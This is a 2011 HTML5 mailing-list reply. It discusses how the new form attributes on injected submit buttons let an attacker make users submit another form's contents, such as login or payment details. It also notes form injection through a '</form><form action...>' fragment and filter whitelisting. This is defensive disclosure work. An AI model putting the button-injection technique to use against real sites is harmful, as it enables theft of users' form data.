Re: [html5] Input attributes allow form tampering

On Tue, 2011-08-02 at 21:50 +0000, Ian Hickson wrote:
> On Tue, 2 Aug 2011, Philippe De Ryck wrote:
> >
> > The new form attributes, which can be used with submit buttons, can make 
> > it difficult for a user to distinguish the form that is being submitted. 
> > This can be used by an adversary to trick the user into submitting a 
> > form, such as an autocompleted login form. Even though this attack was 
> > already possible with JavaScript enabled, this new vector does not 
> > depend on scripts. Additionally, it is possible that current content 
> > validation filters do not yet prevent against button injection.
> 
> Surely this was already possible by just injecting </form><form action...> 
> in the same place as the button would be inserted today?

It is indeed very likely that form injection would also be possible. The
difference however is that by injecting a button, you can trick the user
into submitting a form that is located somewhere else on the page. In
contrast to an injected form, which needs to be explicitly filled out by
the user, the button can steal another form's contents (e.g. a purchase
form where you enter your details (Address, CC, ...), where an attacker
can inject a "quick checkout" button)

> 
> > Alternatively, if changing the specification is not possible, developers 
> > should be warned about this attack vector, so they can update their 
> > content filters.
> 
> Filters must be written using whitelists. A filter written using a 
> blacklist is essentially worthless. A whitelist filter would not be 
> affected by this or many other additions to HTML.

I agree with the whitelisting vs blacklisting (although blacklists will
be used in practice), and see that you have included a general security
section warning against blacklists.

-- 
Philippe De Ryck
K.U.Leuven, Dept. of Computer Science


Disclaimer: http://www.kuleuven.be/cwis/email_disclaimer.htm

Received on Wednesday, 3 August 2011 09:20:32 UTC